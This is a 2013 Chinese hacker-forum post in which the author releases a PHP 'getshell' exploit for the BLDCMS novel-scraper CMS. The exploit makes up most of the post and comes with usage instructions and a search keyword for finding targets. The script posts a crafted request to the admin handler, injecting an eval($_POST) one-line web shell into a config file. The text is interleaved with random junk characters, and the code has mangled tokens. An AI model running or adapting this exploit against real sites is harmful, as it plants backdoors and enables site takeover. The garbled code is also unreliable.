之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞7 u: `; _5 w# k; T. p
; { Q1 U" [; Y4 V7 ~ 3 f" _3 R" m( P
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 5 b# Q3 S% O5 W8 b y
& H% Z1 d8 p; b2 \9 O# R$ s
既然都有人发了 我就把我之前写好的EXP放出来吧& @" @- K; W, Z. h7 `0 J
b, ?; F" _# W: Y1 {& ~
view source print?01.php;">: D! G9 R! z* i, V
02.<!--?php
3 n: y. b, u% {* s& I2 h7 ~03.echo "-------------------------------------------------------------------
" H# S l( y+ M8 R0 n04.
' N: h. D3 c& S& V4 Y05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP( r+ B; i ^/ T1 v+ m1 ] D7 _6 @" B; L
06. 8 D7 _, b8 l% |* r. H
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun ?0 r. I; g: y( n; }9 w# d3 b
08.
7 J2 l; M4 ~' Y# b9 F$ R09.QQ:981009941\r\n 2013.3.21\r\n 0 k9 ]0 {3 v: r% E
10. 8 k6 ]' V" D/ k5 e
11. ' y* H% i' C- [5 a4 j
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
% [# q) k. V6 _$ V" N13. 8 ]4 H) M) z; V5 W3 q
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------. z7 H0 s& H j2 h
15.
8 |8 M+ g0 D* C3 H! o" O: s, ]8 K16.--------------------------------------------------------------------\r\n";8 s x6 _/ G+ P; q3 R
17.$url=$argv[1];, T: o* P" ~9 } _
18.$dir=$argv[2];
: w2 G" x+ y. N: I, W# v19.$pass=$argv[3];
- k) ~9 q$ U7 ]; q4 h9 W20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';+ G0 Z# o: b4 k
21.if (emptyempty($pass)||emptyempty($url))# F0 X& t' l2 o0 H$ w; ^5 g
22.{exit("请输入参数");}2 g/ O; G& o0 @5 ?& m
23.else" h7 L! S" }. K" a0 j8 p3 J
24.{
$ I- i0 [3 s+ K% [+ u' _25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev& N c1 r; U3 C$ t
26.
( i5 D4 ^* m3 U# T$ G# D27.al;
' O$ d) g" {( q. V+ e5 l0 C( ^28.$length = strlen($fuckdata);
& T2 {# J. |9 {* H29.function getshell($url,$pass)
2 C4 z$ p: j/ O1 D' y) M8 R) v30.{0 @9 v2 x$ S$ |; }; \
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
0 s5 K. l/ B- C4 e6 {; w32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";1 N& K1 a% L7 T6 v8 b" R! n
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
$ L9 T& r# c I& `& A34.$header .= "User-Agent: MSIE\r\n";
; a* q, X& Z. \" x' m35.$header .= "Host:".$url."\r\n";# r* T; a( C3 U3 H( r: n
36.$header .= "Content-Length: ".$length."\r\n";! h8 J/ {' }3 u& U, r- G: f
37.$header .= "Connection: Close\r\n";
1 l E( R$ }# i. |0 t& V5 s4 d38.$header .="\r\n";
! C+ B$ F; o1 b/ _1 Q$ ?- |: f( R39.$header .= $fuckdata."\r\n\r\n";
, h& V! ]/ i2 L& G7 Q3 {40.$fp = fsockopen($url, 80,$errno,$errstr,15);
& Y: z% ?; E z& h7 N41.if (!$fp)
( _$ x' P. n1 J( e- L3 z42.{, c C' K5 |* R+ l1 V1 P8 B
43.exit ("利用失败:请检查指定目标是否能正常打开");8 B) V, q( z$ i' z. p/ U
44.}
5 ^4 {& ~, e( W. X' Z0 L45.else{ if (!fputs($fp,$header))$ B: r! c" \% K. i3 a- i
46.{exit ("利用失败");}
- O8 u5 `$ a) X: _47.else- H( D5 v/ _: c
48.{# E8 R1 t. B2 ^! E
49.$receive = '';% _) T# R5 {! |
50.while (!feof($fp)) {
; j# Z# U$ r2 Z v51.$receive .= @fgets($fp, 1000);
9 n* W! k$ O1 m) _52.}
& x6 t7 Q4 m- x& s. \6 B5 F7 ]53.@fclose($fp);4 b- ]# I$ p5 Z0 c
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标* g, q5 B+ Y* e6 j
55. 0 q: w& U/ G' L
56.GPC是否=off)";
& k5 x5 X5 f8 q6 T6 T; m57.}}
3 x; V. o% C! `5 I6 _/ e58.} e& H# p4 o; m0 [( X
59.}5 u* r) ^2 f. W( }0 n/ l# R1 { v
60.getshell($url,$pass);
% U$ j: ?' G( b9 B) ^61.?-->( d6 p1 N7 a# w7 j# c/ Y0 W+ k) \# f
: f+ ]1 V& ?% Z; ]) F% ?, a
* M2 J" n e+ y0 q0 x& N0 o
# t% Y4 }7 ]1 F q0 Sby 数据流
! N/ n+ I, h: o. t* G5 p$ o |
发表于 2013-3-26 20:49:10
收藏
支持
反对